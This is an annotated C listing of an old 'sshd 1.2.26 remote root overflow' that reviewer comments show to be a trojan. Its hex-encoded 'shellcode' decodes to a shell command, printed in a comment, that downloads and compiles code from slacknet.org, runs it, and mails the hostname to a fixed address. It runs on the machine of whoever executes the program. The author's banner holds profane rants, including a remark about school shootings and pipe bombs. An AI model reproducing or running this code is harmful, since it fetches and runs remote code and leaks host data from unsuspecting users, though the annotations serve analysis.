


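sshd 1.2.26 remote root overflow exploiter (the author's title; the listing below builds no overflow payload and ends by running an embedded shell command on the machine that executes it)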




/*     sshd 1.2.26 remote root overflow by ben-z of gH + fts           *
 *        usage: sshdx <box running ssh> [command to exec]             *
 * ------------------------------------------------------------------- *
 * WARNING!: use this at your own risk! (THIS TOOL IS VERY DANGEROUS!) *
 * ------------------------------------------------------------------- *
 *  stuff:                                                             *
 *   this is my going away present to the internet. my mommy took my   *
 *   monitors and keyboards away for failing 4 classes :D and ya know  *
 *   whats even better? tommorows my 16th birthday, and instead of     *
 *   getting shit, im getting shit taken away.. sounds fair doesnt it? *
 *   this code is dedicated to all the fucking communist idiotic       *
 *   bastards out there that force their kids to go to a place where   *
 *   nothing is learned, for no fucking reason whatsoever.             *
 *  my advice:                                                         *
 *   get a job, learn c, make more money than whoever in charge of you *
 *   does, and then show them what the fucks up.. its shit like grades *
 *   that makes ordinary kids want to go into school shooting and      *
 *   throwing pipe bombs. instead of making us memorize every fucking  *
 *   name on the declaration of independence or the periodic table,    *
 *   why not let us actually learn something and use our gift of       *
 *   intelligence to think instead of coughing up shit they stuffed    *
 *   down our throat during the year. im not just going off on the     *
 *   public school system, im going off on every ignorant adult who    *
 *   actually believes that sending their children off to hell from    *
 *   8-3 is helping them learn how to think.                           *
 *  thanks to my friends:                                              *
 *   ice-e                - one of my best friends for almost 4 years  *
 *                          now.. hes still learning the ways, but he  *
 *                          has the right attitude to go much further  *
 *                          than me.                                   *
 *   folk		  - my all time favorite scripting buddy.      *
 *   metalman             - slacknet.org owns us all! *uNF* *booga*    *
 *   eklipz               - sits through my "advanced qbasic" class    *
 *                          with me almost every day.. that deserves   *
 *                          mad props.                                 *
 *   Inominate            - wrote the reet string->hex converter i use *
 *   fred                 - this code is _heavily_ based upon his :)   *
 *   mosthated            - i have your docz Eric Witfield (j/k) :D    *
 *   ne0h                 - gH world domination in progress! *ohyah*   *
 *   rhodie               - our former resident 13 year old prodigy    *
 *   c0sm0s1              - found the magic link (you know..)          *
 *   cyrus                - ran the ircd that will go down in history  *
 *   magicfx              - same as above -- come back! we miss you!#$ *
 *   chawp                - puts the unf back in drunfk :D             *
 *   xela                 - led me to my first ever copy of mirc.exe   *
 *   joez (dj butta)      - youve got a monkey in your shoe.           *
 *   ka0z                 - everybody gives props to ka0z.. heres mine *
 *   ka0s                 - (has nothing to do with ka0z) meep meep    *
 *   madlion              - learned drunken nollie hardflips yet?      *
 *   aXion                - "This Shit's Got Pop"                      *
 *   zeronine             - just punch a gaurd in the jaw and make a   *
 *                          run for it man.. cops are fat and they     *
 *                          make the prisoners work out.. how smart is *
 *                          this? peace yo.. we still lub ya..         *
 *   aj                   - basically taught me everything about linux *
 *   fts(2)               - Fuck The System - you guys are my family   *
 *   gH (global hell)     - world domination in progress.. we own you. *
 *  awards:                                                            *
 *   JP                   - wins for the anti-elite site of the year.  *
 *   ne0h                 - definatly deserves the "i own every fuckin *
 *                          site on the net with a stupid message and  *
 *                          have my own fan club for it" award. :)     *
 *   the FBI              - most ignorant lawsuit of the year award.   *
 *   ben-z                - wins the "longest intro to code" award :D  *
 * ------------------------------------------------------------------- */
#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * Despite the name, this array holds no machine instructions. Every byte is
 * printable ASCII, and decoded it is a /bin/sh command line:
 *
 *   lynx -dump http://slacknet.org/blackhole.c >>bh.c ; gcc -o bh bh.c ;
 *   hostname | mail -s "owned" benz@slacknet.org ; ./bh &
 *
 * That is: fetch C source over plain HTTP, append it to bh.c, compile it,
 * mail the local hostname to a fixed address, and start the compiled binary
 * in the background. main() passes this string to "/bin/sh -c" on the host
 * that runs the program, so the hex escapes only hide the command from
 * someone skimming the source before compiling it.
 */
char shellcode[] = \
"\x6c\x79\x6e\x78\x20\x2d\x64\x75\x6d\x70\x20\x68\x74\x74\x70\x3a\x2f\x2f" \
"\x73\x6c\x61\x63\x6b\x6e\x65\x74\x2e\x6f\x72\x67\x2f" \
"\x62\x6c\x61\x63\x6b\x68\x6f\x6c\x65\x2e\x63\x20\x3e\x3e\x62\x68\x2e\x63" \
"\x20\x3b\x20\x67\x63\x63\x20\x2d\x6f\x20\x62\x68\x20\x62\x68\x2e\x63\x20" \
"\x3b\x20\x68\x6f\x73\x74\x6e\x61\x6d\x65\x20\x7c\x20\x6d\x61\x69\x6c\x20" \
"\x2d\x73\x20\x22\x6f\x77\x6e\x65\x64\x22\x20\x62\x65\x6e\x7a\x40\x73\x6c" \
"\x61\x63\x6b\x6e\x65\x74\x2e\x6f\x72\x67\x20\x3b\x20\x2e\x2f\x62\x68\x20\x26";

/*
 * Only BSIZE and ASIZE are referenced by main(), and only to size and index
 * the buffer. NOP, OFFSET and ADDR are never used anywhere in this listing:
 * no NOP sled is written and no return address is placed in the buffer.
 */
#define	NOP	0x90
#define	BSIZE	256
#define	OFFSET	400
#define	ADDR	0xbffff658
#define ASIZE	2000

/*
 * Entry point. What the visible code does, in order:
 *   1. requires argv[1] (a host name); argv[2], advertised in the usage text
 *      as the command to execute, is never read;
 *   2. allocates a buffer and copies the `shellcode` string into part of it,
 *      leaving the rest uninitialized;
 *   3. resolves argv[1], connects to TCP port 22 and sends the buffer;
 *   4. unconditionally runs `shellcode` through "/bin/sh -c" on the LOCAL
 *      machine via execl().
 * Step 4 is the only step with a well-defined effect. Nothing sent in step 3
 * contains a return address or machine code, so the listing behaves as a
 * trojan aimed at whoever compiles and runs it, not as a working exploit.
 *
 * NOTE(review): exit/malloc, memcpy/strlen and bzero/bcopy are used, but
 * <stdlib.h>, <string.h> and <strings.h> are not in the include list above.
 */
int
main(int argc, char *argv[])
{
	char *buffer;
	int s;
	struct hostent *hp;
	struct sockaddr_in sin;
	if (argc < 2) {
		printf("%s <target> [cmd (/bin/sh)]\n", argv[0]);
		exit(1);
	  }
	/* malloc() does not clear memory; the contents start indeterminate. */
	buffer = (char *) malloc(BSIZE + ASIZE + 100);
	if (buffer == NULL) {
		printf("Not enough memory\n");
		exit(1);
	  }
	/* Places the ASCII command so that it ends at offset BSIZE. The bytes
	 * before it, and the ASIZE bytes after it, are never written. */
	memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode,
		strlen(shellcode));
	buffer[BSIZE + ASIZE] = ';';
	buffer[BSIZE + ASIZE + 1] = '\0';
	hp = gethostbyname(argv[1]);
	if (hp == NULL) {
		printf("no such server\n");
		exit(1);
	  }
	bzero(&sin, sizeof(sin));
	bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(22);
	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (s < 0) {
		printf("Can't open socket\n");
		exit(1);
	  }
	if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
		printf("Connection refused\n");
		exit(1);
	  }
	printf("sending exploit code...\n");
	/* strlen() here scans uninitialized heap bytes, so the amount sent is
	 * whatever precedes the first zero byte found. send() returns a byte
	 * count or -1, so "!= 1" is true for nearly every outcome, including
	 * failure: the success message says nothing about the remote host. */
	if (send(s, buffer, strlen(buffer), 0) != 1)
		printf("overflow succesfull! cmd sent.\n");
	  else
		printf("sorry, this site isn't vulnerable\n");
	/* Runs the embedded command line on this machine, with the privileges
	 * of the user who started the program, whatever send() returned. */
	execl("/bin/sh", "sh", "-c", shellcode, 0);
	/* Reached only if execl() fails; on success the process image is
	 * replaced by /bin/sh. */
	printf("-eof-\n");
}

